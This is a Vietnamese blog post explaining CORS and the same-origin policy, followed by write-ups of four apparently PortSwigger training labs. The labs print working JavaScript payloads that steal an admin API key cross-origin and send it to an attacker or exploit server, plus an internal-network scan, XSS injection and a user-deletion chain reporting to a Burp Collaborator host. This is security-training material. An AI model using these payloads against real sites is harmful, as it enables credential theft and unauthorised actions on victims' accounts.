<!doctype html>
<html lang="en-us">
  <head>
    <title>Cross-origin resource sharing - CORS // DatNLQ</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.88.1" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="DatNLQ" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://datnlq.github.io/css/main.min.4a7ec8660f9a44b08c4da97c5f2e31b1192df1d4d0322e65c0dbbc6ecb1b863f.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Cross-origin resource sharing - CORS"/>
<meta name="twitter:description" content="Cross-origin resource sharing (CORS) là gì ? What is CORS ? Tên đầy đủ là Cross-Origin Resource Sharing. Hiểu sâu hơn đó chính là chia sẻ tài nguyên có nhiều nguồn gốc khác nhau. Chính sách nguồn gốc giống nhau của trình duyệt là một cơ chế bảo mật quan trọng. Khách hàng từ các nguồn khác nhau không thể truy cập tài nguyên của nhau nếu không được phép. Định nghĩa của tương đồng là protocol,domain và port của liên kết truy cập là giống nhau."/>

    <meta property="og:title" content="Cross-origin resource sharing - CORS" />
<meta property="og:description" content="Cross-origin resource sharing (CORS) là gì ? What is CORS ? Tên đầy đủ là Cross-Origin Resource Sharing. Hiểu sâu hơn đó chính là chia sẻ tài nguyên có nhiều nguồn gốc khác nhau. Chính sách nguồn gốc giống nhau của trình duyệt là một cơ chế bảo mật quan trọng. Khách hàng từ các nguồn khác nhau không thể truy cập tài nguyên của nhau nếu không được phép. Định nghĩa của tương đồng là protocol,domain và port của liên kết truy cập là giống nhau." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://datnlq.github.io/posts/cors/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-09-28T23:34:34+07:00" />
<meta property="article:modified_time" content="2021-09-28T23:34:34+07:00" />



  </head>
  <body>
    <header class="app-header">
      <a href="https://datnlq.github.io/"><img class="app-header-avatar" src="/avatar.jpg" alt="DatNLQ" /></a>
      <h1>DatNLQ</h1>
      <p>DatNLQ&#39;s personal website</p>
      <div class="app-header-social">
        
          <a href="https://github.com/datnlq" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>My Github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">Cross-origin resource sharing - CORS</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Sep 28, 2021
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          12 min read
        </div>
      </div>
    </header>
    <div class="post-content">
      <h1 id="cross-origin-resource-sharing-cors-là-gì-">Cross-origin resource sharing (CORS) là gì ?</h1>
<h2 id="what-is-cors-">What is CORS ?</h2>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_lythuyet.png?raw=true" alt="image"></p>
<p>Tên đầy đủ là Cross-Origin Resource Sharing. Hiểu sâu hơn đó chính là chia sẻ tài nguyên có nhiều nguồn gốc khác nhau. Chính sách nguồn
gốc giống nhau của trình duyệt là một cơ chế bảo mật quan trọng. Khách hàng từ các nguồn khác nhau không thể truy cập tài nguyên của nhau
nếu không được phép. Định nghĩa của tương đồng là protocol,domain và port của liên kết truy cập là giống nhau. Trong các ứng dụng thực tế,
các yêu cầu hợp lý giữa nhiều miền cũng rất quan trọng đối với một số ứng dụng.</p>
<h2 id="same-origin-policy-cùng-nguồn-gốc">Same-Origin Policy (Cùng nguồn gốc)</h2>
<p>Same-origin policy là khi một website thực thi một cái gì đó. Nghĩa là, theo mặc định, ứng dụng web sử dụng API chỉ có thể yêu cầu tài nguyên
HTTP từ cùng một nguồn gốc. Ví dụ, ![image](<a href="https://www.mywebsite.com">https://www.mywebsite.com</a> yêu cầu ![image](<a href="https://www.mywebsite.com/page">https://www.mywebsite.com/page</a> không có vấn đề gì. Nhưng khi tài nguyên
được đặt trên các trang web có protocol , domain phụ hoặc port khác nhau , thì đó là một yêu cầu không cùng nguồn gốc mà hay
thường gọi là tên miền chéo.</p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/Same-origin%20policy.png?raw=true" alt="image"></p>
<p>Vậy, tại sao lại có same-origin policy tồn tại? Giả sử rằng chính sách cùng nguồn gốc không tồn tại và bạn đã vô tình nhấp vào một trong nhiều liên
kết có virutss mà bạn của bạn gửi cho bạn trên Facebook. Liên kết này chuyển hướng bạn đến một &ldquo;trang web xấu&rdquo; có nhúng iframe tải trang web của ngân
hàng của bạn và đăng nhập thành công cho bạn bằng một số cookie đã đặt! 😬 Sau khi đăng nhập thành công, trang web lừa đảo này còn có thể kiểm soát DOM
của iframe và chuyển tiền trong thẻ của bạn thông qua một loạt thao tác thần sầu mà bạn không hề biết được.</p>
<h2 id="cors-http-headers">CORS HTTP headers</h2>
<ul>
<li>
<p>CORS là một cơ chế xác nhận thông qua Header của request. Cụ thể là trên Server sẽ nói với browser về quy định chấp nhận những request từ domain nào và phương
thức ra sao (GET, POST, PUT, v.v..)</p>
<ul>
<li>
<p>Access-Control-Allow-Origin: Những origin mà server cho phép. (ví dụ server loda.his chỉ chấp nhận loda.me request lên)</p>
</li>
<li>
<p>Access-Control-Allow-Headers: Những Header được server cho phép. (ví dụ x-authorize, origin, cái này do server bạn quy định)</p>
</li>
<li>
<p>Access-Control-Allow-Methods: Những Method được servẻ cho phép (POST, GET, v.v..)</p>
</li>
</ul>
</li>
<li>
<p>Preflight request:</p>
</li>
</ul>
<p>Một cái preflight request là một request được gửi từ phía trình duyệt để thăm dò xem server có hiểu/ hỗ trợ giao thức CORS hay không. Nó được tự động gởi bởi
trình duyệt. Việc của phía server là trả về những headers cần thiết cho phía client.</p>
<ul>
<li>
<p>Origin: domain hiện tại</p>
</li>
<li>
<p>Access-Control-Request-Method: Gửi lên các method để kiểm tra xem server có accept không. (GET, POST, v.v..)</p>
</li>
<li>
<p>Access-Control-Request-Headers: thăm dò xem một header nào đó có được chấp nhận không.</p>
</li>
</ul>
<h2 id="cơ-chế-hoạt-động-của-cors-như-thế-nào">Cơ chế hoạt động của CORS như thế nào?</h2>
<ul>
<li>
<p>Trường hợp đơn giản nhất, client (web app chạy ở browser) sẽ tạo request GET, POST, PUT, HEAD, etc để yêu cầu server làm một việc gì đó. Những request này sẽ được đính
kèm một header tên là Origin để chỉ định origin của client code (giá trị của header này chính là domain của trang web).</p>
</li>
<li>
<p>Server sẽ xem xét Origin để biết được nguồn này có phải là nguồn hợp lệ hay không. Nếu hợp lệ, server sẽ trả về response kèm với header Access-Control-Allow-Origin.
Header này sẽ cho biết xem client có phải là nguồn hợp lệ để browser tiếp tục thực hiện quá trình request.</p>
</li>
<li>
<p>Trong trường hợp thông thường, Access-Control-Allow-Origin sẽ có giá trị giống như Origin, một số trường hợp giá trị của Access-Control-Allow-Origin sẽ nhìn giống giống
như Regex hay chỉ đơn giản là *, tuy nhiên thì cách dùng * thường được coi là không an toàn, ngoại trừ trường hợp API của bạn được public hoàn toàn và ai cũng có thể truy
cập được.</p>
</li>
</ul>
<p>==&gt; Và như thế, nếu không có header Access-Control-Allow-Origin hoặc giá trị của nó không hợp lệ thì browser sẽ không cho phép</p>
<h3 id="ví-dụ-">Ví dụ :</h3>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/example1.gif?raw=true" alt="gif">
<img src="https://github.com/datnlq/Source/blob/main/CORS/image/example2.gif?raw=true" alt="gif"></p>
<h2 id="ngăn-chặn-các-cuộc-tấn-công-cors">Ngăn chặn các cuộc tấn công CORS</h2>
<p>Các lỗ hổng CORS chủ yếu phát sinh do cách thiếp lập không đúng cách hoặc có sai sót.</p>
<ul>
<li>
<p>Proper configuration of cross-domain requests(Cấu hình thích hợp của các yêu cầu tên miền chéo) : Nếu tài nguyên web chứa thông tin &ldquo;nhạy cảm&rdquo;, nguồn gốc web phải được
chỉ định chính xác trong tiêu đề Access-Control-Allow-Origin.</p>
</li>
<li>
<p>Only allow trusted sites(Chỉ cho phép những trang web tin cậy): Các nguồn gốc được chỉ định trong tiêu đề Access-Control-Allow-Origin chỉ nên là các trang web đáng tin cậy.
Đặc biệt, nguồn gốc phản ánh động từ các yêu cầu tên miền chéo mà không cần xác thực có thể dễ dàng khai thác và nên tránh.</p>
</li>
<li>
<p>Avoid whitelisting null(Tránh sử dụng liệt kê null): Tránh sử dụng tiêu đề Access-Control-Allow-Origin: null</p>
</li>
<li>
<p>Avoid wildcards in internal networks(Tránh các ký tự đại diện trong mạng nội bộ): Chỉ tin cậy cấu hình mạng để bảo vệ tài nguyên bên trong là không đủ khi các trình duyệt nội
bộ có thể truy cập các miền bên ngoài không đáng tin cậy.</p>
</li>
</ul>
<h2 id="cors-lab">CORS Lab</h2>
<h3 id="lab-cors-vulnerability-with-basic-origin-reflection">Lab: CORS vulnerability with basic origin reflection</h3>
<p>Bài lab đã mô tả là trang web này có cấu hình CORS không an toàn ở chỗ nó tin cậy tất cả các nguồn gốc.</p>
<p>Để giải quyết bài lab, hãy tạo một số JavaScript sử dụng CORS để truy xuất khóa API của quản trị viên và tải mã lên máy chủ khai thác của bạn.
Lab được giải quyết khi bạn gửi thành công khóa API của quản trị viên.</p>
<p>Bạn có thể đăng nhập vào tài khoản của mình bằng thông tin đăng nhập sau: wiener: peter</p>
<p>Truy cập bài lab và chúng ta thấy được 1 blog và có phần login.</p>
<p>Theo như lab thì chúng ta login vào account được cấp từ trước và thấy được APIKey, đây chính là mục tiêu của chúng ta. Bắt lại request mà sẽ phản hồi về APIKey.</p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_refletion.png?raw=true" alt="image"></p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_refletion_verfi.png?raw=true" alt="image"></p>
<p>Chuyển request sang repeater và chèn thêm dòng <em>Origin: ![image](<a href="https://example.com">https://example.com</a></em> vào request và send thì chúng ta sẽ thấy phản hồi <em>Access-Control-Allow-Origin</em> như mô tả vì trang web này tin cậy mọi nguồn gốc, điều đó dẫn đến bất kỳ trang web nào cũng có thể lấy được thông tin từ nó. Để lấy được apikey chúng ta có payload theo form sau :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">var req = new XMLHttpRequest();
req.onload = reqListener;
req.open(&#39;get&#39;,&#39;![image](https://vulnerable-website.com/sensitive-victim-data&#39;,true);
req.withCredentials = true;
req.send();

function reqListener() {
location=&#39;//malicious-website.com/log?key=&#39;+this.responseText;
};
</code></pre></div><p>Và từ đó chúng ta có được payload để sent vào exploit server như sau :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">&lt;script&gt;
 var req = new XMLHttpRequest();
 req.onload = reqListener;
 req.open(&#39;get&#39;,&#39;![image](https://ac621fa31ffe7a398004558a00e900a1.web-security-academy.net/accountDetails&#39;,true);
 req.withCredentials = true;
 req.send();

 function reqListener() {
     location=&#39;/log?key=&#39;+this.responseText;
 };
&lt;/script&gt;
</code></pre></div><p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_refletion_exploit.png?raw=true" alt="image"></p>
<p>Sau khi Store payload và Deliver to Victim thì chúng ta AccessLog để lấy dữ liệu từ website chúng ta muốn và in ra màn hình như sau :</p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_refletion_accesslog.png?raw=true" alt="image"></p>
<p>Chúng ta nhận thấy dòng log?key thì coppy và quan phần Decoder của BurpSuite để decode, chọn option url và chúng ta lấy được Apikey =&gt; submit để solve bài lab.</p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_refletion_apikey.png?raw=true" alt="image"></p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_refletion_submitsolve.png?raw=true" alt="image"></p>
<h3 id="lab-cors-vulnerability-with-trusted-null-origin">Lab: CORS vulnerability with trusted null origin</h3>
<p>Trang web này có cấu hình CORS không an toàn ở chỗ nó tin tưởng nguồn gốc &ldquo;null&rdquo;.</p>
<p>Hãy tạo một số JavaScript sử dụng CORS để truy xuất khóa API của quản trị viên và tải mã lên máy chủ khai thác của bạn. Lab được giải quyết khi bạn gửi thành công khóa API của quản trị viên.</p>
<p>Bạn có thể đăng nhập vào tài khoản của mình bằng thông tin đăng nhập sau: wiener: peter</p>
<p>Tương tự như bài trước chúng ta phải leak đc APIkey của account được cấp sẵn. Tuy nhiên lỗ hồng lần này là vì CORS Origin : null chứ không phải là * như lần trước nên cách khai thác sẽ khác.</p>
<p>Truy cập bài lab tương tự như bài trên và bắt lại request để phân tích</p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_truenull_request.png?raw=true" alt="image"></p>
<p>Như đề bài mô tả thì web này lại tin cậy là null nên chúng ta gửi request kèm theo Origin : null và nhận đc như sau</p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_truenull_verf.png?raw=true" alt="image"></p>
<p>Chúng ta có thể sử dụng nhiều thủ thuật khác nhau để tạo ra một yêu cầu tên miền chéo có chứa giá trị null trong Origin Header. Điều này sẽ đáp ứng whitelist, dẫn đến truy cập tên miền chéo. Từ đó có payload như sau:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">&lt;iframe sandbox=&#34;allow-scripts allow-top-navigation allow-forms&#34; src=&#34;data:text/html, &lt;script&gt;
   var req = new XMLHttpRequest ();
   req.onload = reqListener;
   req.open(&#39;get&#39;,&#39;![image](https://ac3e1f561f18f33a80d6a58f005900ee.web-security-academy.net/accountDetails&#39;,true);
   req.withCredentials = true;
   req.send();

   function reqListener() {
       location=&#39;![image](https://exploit-ac971f661f59f3b48092a571018c0000.web-security-academy.net/log?key=&#39;+encodeURIComponent(this.responseText);
   };
&lt;/script&gt;&#34;&gt;&lt;/iframe&gt;
</code></pre></div><p>Truy cập vào exploit server và Store payload Deliver to Victim để sent payload đi sau đó Access log để in ra màn hình data leak được như sau:</p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_truenull_accesslog.png?raw=true" alt="image"></p>
<p>Chúng ta nhận thấy được request là log?key thì cop và chuyển sang  Decoder của Burp suite để decode như sau :
<img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_truenull_decode.png?raw=true" alt="image"></p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_truenull_submitapikey.png?raw=true" alt="image"></p>
<h3 id="lab-cors-vulnerability-with-trusted-insecure-protocols">Lab: CORS vulnerability with trusted insecure protocols</h3>
<p>Trang web này có cấu hình CORS không an toàn ở chỗ nó tin cậy tất cả các miền phụ bất kể giao thức.</p>
<p>Hãy tạo một số JavaScript sử dụng CORS để truy xuất khóa API của quản trị viên và tải mã lên máy chủ khai thác của bạn. Lab được giải quyết khi bạn gửi thành công khóa API của quản trị viên.</p>
<p>Bạn có thể đăng nhập vào tài khoản của mình bằng thông tin đăng nhập sau: wiener: peter</p>
<p>Trong bài này chúng ta có 1 trang web bán hàng như sau :</p>
<p>Đăng nhập và bắt lại request có chưa APIKey. Thêm Origin Header bất kỳ để check xem có sử dụng CORS hay không.</p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_protocol_checkscors.png?raw=true" alt="image"></p>
<p>Như kết quả trả về ta thấy <em>Access-Control-Allow-Origin</em> và <em>Access-Control-Allow-Credentials</em> điều đó cho thấy có áp dụng CORS.</p>
<p>Vì bài này chú tâm đến các giao thức nên mình sẽ thử những chức năng liên quan đến API, điển hình như trong web sẽ có chức năng Check Stock, chúng ta bắt request của chức năng này xem và phân tích.
<img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_protocol_checkstock.png?raw=true" alt="image"></p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_protocol_checkstock_request.png?raw=true" alt="image"></p>
<p>Như đã thấy thì chức năng này sẽ lấy data từ 1 tên miền phụ khác là : <em>http://stock.![image](<a href="https://acfb1faa1ec0c6ec81f22d5200ae00ad.web-security-academy.net">https://acfb1faa1ec0c6ec81f22d5200ae00ad.web-security-academy.net</a></em> chúng ta có thể lợi dụng tên miền này để leak APIKey như những bài trước, để kiểm tra giả thiết thì thử thay thế Origin Header ở phần account xem có được phép hay không</p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_protocol_checkdomain.png?raw=true" alt="image"></p>
<p>Sau đó dựa theo form khai thác dựa trên tên miền phụ được phép truy cập dữ liệu như sau ;</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">&lt;script&gt;
   document.location=&#34;http://stock.![image](https://acfb1faa1ec0c6ec81f22d5200ae00ad.web-security-academy.net/?productId=4
   &lt;script&gt;var req = new XMLHttpRequest(); req.onload = reqListener; req.open(&#39;get&#39;,&#39;![image](https://![image](https://acfb1faa1ec0c6ec81f22d5200ae00ad.
   web-security-academy.net/accountDetails&#39;,true); req.withCredentials = true;req.send();function reqListener() 
   {location=&#39;![image](https://exploit-ac131f241ecbc63281092d6d012d001e.web-security-academy.net/log?key=&#39;%2bthis.responseText; };%3c/script&gt;&amp;storeId=1&#34;
&lt;/script&gt;
</code></pre></div><p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_protocol_exploitserver.png?raw=true" alt="image"></p>
<p>Sau đó Store payload Deliver to Victim để gửi payload sang trang web mà mình exploit</p>
<p>Access log để hiện những data mà mình leak được thông qua tên miền phụ như sau :</p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_protocal_accesslog.png?raw=true" alt="image"></p>
<p>Truy cập decoder của Burp để decoder url và lấy apikey để submit</p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_protocol_decoder.png?raw=true" alt="image"></p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_protocal_submit.png?raw=true" alt="image"></p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_protocal_solve.png?raw=true" alt="image"></p>
<h3 id="lab-cors-vulnerability-with-internal-network-pivot-attack">Lab: CORS vulnerability with internal network pivot attack</h3>
<p>Trang web này có cấu hình CORS không an toàn ở chỗ nó tin cậy tất cả các nguồn gốc của mạng nội bộ.</p>
<p>Lab này yêu cầu nhiều bước để hoàn thành. Để giải quyếtlab, hãy tạo một số JavaScript để định vị điểm cuối trên mạng cục bộ (192.168.0.0/24, cổng 8080) mà sau đó bạn có thể sử dụng để xác định và tạo một cuộc tấn công dựa trên CORS để xóa người dùng. Lab được giải quyết khi bạn xóa người dùng Carlos.</p>
<p>Trường hợp mà bài lab này đưa ra đó chính là chúng ta phải tìm được vị trí của 1 private IP mà website này tin tưởng và dựa vào đó để tấn công và xóa đi người dùng,</p>
<p>Đây là 1 bài cấp độ Expert có nghĩa là 1 bài cực kỳ phức tạp và level cao. Tuy nhiên chúng ta đã biết được cách thức khai thác là gì nên bây giờ sẽ follow theo hướng dẫn và exploit nó thôi.</p>
<h5 id="bước-đầu-tiên-quét-mạng-nội-bộ">Bước đầu tiên: quét mạng nội bộ</h5>
<p>Đầu tiên việc chúng ta cần làm là quét mạng nội bộ để tìm ra được địa chỉ IP, để tìm được thì chúng ta cần sự hỗ trợ của Burp Suite Collaborator Client để poll những response leak được về, đoạn payload dưới đây sẽ quét từ http://192.168.0.1 - http://192.168.0.255 và tìm xem địa chỉ nào phù hợp</p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_pivot_findIP_exploit.png?raw=true" alt="image"></p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">&lt;script&gt;
var q = [], collaboratorURL = &#39;http://bbq6iwl2yh0xqnyyqkm0r8w9g0mqaf.burpcollaborator.net&#39;;
for(i=1;i&lt;=255;i++){
  q.push(
  function(url){
    return function(wait){
    fetchUrl(url,wait);
    }
  }(&#39;http://192.168.0.&#39;+i+&#39;:8080&#39;));
}
for(i=1;i&lt;=20;i++){
  if(q.length)q.shift()(i*100);
}
function fetchUrl(url, wait){
  var controller = new AbortController(), signal = controller.signal;
  fetch(url, {signal}).then(r=&gt;r.text().then(text=&gt;
    {
    location = collaboratorURL + &#39;?ip=&#39;+url.replace(/^http:\/\//,&#39;&#39;)+&#39;&amp;code=&#39;+encodeURIComponent(text)+&#39;&amp;&#39;+Date.now()
  }
  ))
  .catch(e =&gt; {
  if(q.length) {
    q.shift()(wait);
  }
  });
  setTimeout(x=&gt;{
  controller.abort();
  if(q.length) {
    q.shift()(wait);
  }
  }, wait);
}
&lt;/script&gt;

</code></pre></div><p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_pivot_findIP_accesslog.png?raw=true" alt="image"></p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_pivot_findIP_pull.png?raw=true" alt="image"></p>
<p>Như chúng ta có thể thấy, chúng ta đã định vị máy chủ nội bộ (trong trường hợp này) là: <em>192.168.0.212:8080</em></p>
<h5 id="bước-thứ-hai-tìm-lỗ-hổng-trong-máy-chủ-nội-bộ">Bước thứ hai: tìm lỗ hổng trong máy chủ nội bộ</h5>
<p>Ở bước này chúng ta thực hiện tương tự bước đầu tiên nhưng khác biệt ở phần payload như sau :</p>
<p>Đoạn code này đang cố gửi username và password đi, nếu như username và password được trả về trong response thì chứng tỏ rằng có thể dẫn đến lỗi XSS.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">&lt;script&gt;
function xss(url, text, vector) {
  location = url + &#39;/login?time=&#39;+Date.now()+&#39;&amp;username=&#39;+encodeURIComponent(vector)+&#39;&amp;password=test&amp;csrf=&#39;+text.match(/csrf&#34; value=&#34;([^&#34;]+)&#34;/)[1];
}

function fetchUrl(url, collaboratorURL){
  fetch(url).then(r=&gt;r.text().then(text=&gt;
  {
    xss(url, text, &#39;&#34;&gt;&lt;img src=&#39;+collaboratorURL+&#39;?foundXSS=1&gt;&#39;);
  }
  ))
}

fetchUrl(&#34;http://192.168.0.212:8080&#34;, &#34;http://bbq6iwl2yh0xqnyyqkm0r8w9g0mqaf.burpcollaborator.net&#34;);
&lt;/script&gt;

</code></pre></div><p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_pivot_findXSS_payload.png?raw=true" alt="image"></p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_pivot_findXSS_pull.png?raw=true" alt="image"></p>
<p>Như chúng tôi mong đợi tên người dùng được phản ánh trong phản hồi (trong hình).</p>
<p>Điều này có nghĩa là chúng ta có thể chuyển hướng nạn nhân đến trang đăng nhập nội bộ và thực thi các tập lệnh từ đó, có thể bypass qua CORS.</p>
<h5 id="bước-thứ-ba--truy-xuất-admin-panel">Bước thứ ba : Truy xuất Admin Panel</h5>
<p>Đoạn code này sẽ cho phép chúng ta truy xuất vào thử panel của admin</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">&lt;script&gt;
function xss(url, text, vector) {
  location = url + &#39;/login?time=&#39;+Date.now()+&#39;&amp;username=&#39;+encodeURIComponent(vector)+&#39;&amp;password=test&amp;csrf=&#39;+text.match(/csrf&#34; value=&#34;([^&#34;]+)&#34;/)[1];
}
function fetchUrl(url, collaboratorURL){
  fetch(url).then(r=&gt;r.text().then(text=&gt;
  {
    xss(url, text, &#39;&#34;&gt;&lt;iframe src=/admin onload=&#34;new Image().src=\&#39;&#39;+collaboratorURL+&#39;?code=\&#39;+encodeURIComponent(this.contentWindow.document.body.innerHTML)&#34;&gt;&#39;);
  }
  ))
}
fetchUrl(&#34;http://192.168.0.212:8080&#34;, &#34;http://bbq6iwl2yh0xqnyyqkm0r8w9g0mqaf.burpcollaborator.net&#34;);
&lt;/script&gt;

</code></pre></div><p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_pivot_checkresponse_exploitserver.png?raw=true" alt="image"></p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_pivot_checkresponse_poll.png?raw=true" alt="image"></p>
<h5 id="bước-cuối">Bước cuối</h5>
<p>Dựa vào biểu mẫu trả về ở bước 3 chúng ta thấy chức năng delete của admin, vây nên chúng ta viết payload như sau để thực thi biểu mẫu delete và xóa username = carlos</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">&lt;script&gt;
function xss(url, text, vector) {
  location = url + &#39;/login?time=&#39;+Date.now()+&#39;&amp;username=&#39;+encodeURIComponent(vector)+&#39;&amp;password=test&amp;csrf=&#39;+text.match(/csrf&#34; value=&#34;([^&#34;]+)&#34;/)[1];
}

function fetchUrl(url){
  fetch(url).then(r=&gt;r.text().then(text=&gt;
  {
    xss(url, text, &#39;&#34;&gt;&lt;iframe src=/admin onload=&#34;var f=this.contentWindow.document.forms[0];if(f.username)f.username.value=\&#39;carlos\&#39;,f.submit()&#34;&gt;&#39;);
  }
  ))
}

fetchUrl(&#34;http://192.168.0.212:8080&#34;);
&lt;/script&gt;

</code></pre></div><p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_pivot_payload.png?raw=true" alt="image"></p>
<p><img src="https://github.com/datnlq/Source/blob/main/CORS/image/CORS_pivot_solve.png?raw=true" alt="image"></p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
